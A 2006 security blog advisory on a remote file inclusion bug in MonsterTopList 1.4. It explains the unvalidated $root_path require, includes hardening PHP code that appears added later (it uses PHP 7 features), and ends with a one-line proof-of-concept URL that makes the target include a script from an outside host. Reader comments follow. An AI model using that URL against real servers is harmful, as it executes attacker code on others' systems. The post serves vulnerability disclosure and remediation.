by r0t,der4444,cembo,VietMafia

Wednesday, April 12, 2006

MonsterTopList

=================================

MonsterTopList- Remote Code Execution bug
By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4
Risk: Moderate
Status: unpatched

=================================

This flaw is due to an input validation error in the "sources/functions.php" script (line 8), which does not validate the "$root_path" variable before using it in a require statement. Remote attackers can supply a URL in that variable to include malicious scripts and execute arbitrary commands with the privileges of the web server.

Code: file sources/functions.php

line 8: require $root_path . "sources/func_output.php";
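The include pattern behind the advisory, shown next to one way of closing it, as an added example written for this post rather than MonsterTopList's own code. Only functions.php and sources/func_output.php come from the advisory; the IN_MTL constant and the safe_require helper are assumptions, and the code is written for PHP 7 or later.

```php
<?php
// Added example, not MonsterTopList code. Shows why the line 8 require is
// exploitable and a hardened replacement for the same include.

// --- Vulnerable shape (as described in the advisory) ------------------------
// With register_globals=On (the default on many PHP 4 / early PHP 5 hosts), a
// request such as functions.php?root_path=http://host.example/ sets $root_path
// from the query string before this line runs. With allow_url_fopen=On the
// require then fetches and executes whatever that URL serves.
//
//     require $root_path . "sources/func_output.php";

// --- Hardened shape ---------------------------------------------------------
// 1. Never derive the include base from request data: compute it from the
//    script's own location so no GET/POST/cookie value can influence it.
//    functions.php lives in sources/, so the application root is one level up.
$root_path = dirname(__DIR__) . DIRECTORY_SEPARATOR;

// 2. Refuse direct requests; functions.php is a library that the application's
//    front controller includes (the IN_MTL constant name is an assumption).
if (!defined('IN_MTL')) {
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access not permitted.');
}

// 3. Resolve the final path and confirm it stays inside the application root
//    before including it. This rejects URLs (realpath() returns false for
//    them) and ../ traversal out of the install directory, even if a bug
//    elsewhere later reintroduces attacker influence over $root_path.
function safe_require(string $base, string $relative): void
{
    $root   = realpath($base);
    $target = realpath($base . $relative);
    if ($root === false || $target === false
        || strpos($target, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Refusing to include path outside application root: ' . $relative);
    }
    require $target;
}

safe_require($root_path, 'sources/func_output.php');
```

The code-level fix removes the attacker's influence over the include path; the server-level settings that make the original bug reachable (register_globals=On, and allow_url_fopen=On, or allow_url_include=On from PHP 5.2 onward) should be turned off as well, since a single unguarded require anywhere in the application is enough to reopen the issue.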



demo:

http://www.monstertoplist.com/demo.html



POC Exploit: http://[target]/[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/

5 Comments:

Blogger r0t told...

glad to see VietMafia on blog!

2:19 PM

 
Anonymous Anonymous told...

He had problems posting to the forum.. It seems that the IDS for the hoster has some problems and blocks some requests.

Maybe it will be fixed with upgrade of board, or maybe hoster has something wrong.

9:31 PM

 
Blogger r0t told...

hm... I did know about that problem.. I had made some posts in the last days without problems..
If he wants his own account on this blog, just let me know.
As I told, in the next days I will upgrade the board; about the hoster, der4444, you know that it is quite good.

10:38 PM

 
Anonymous Anonymous told...

r0t,

It's quite nice if I can have my own account on this blog. I'm learning so I will try my best :)

VietMafia

6:12 PM

 
Blogger r0t told...

VietMafia, ok. An invitation will be sent to the email that you registered on the board.

4:12 PM

 

Copyright (c) 2006 Pridels Sec Crew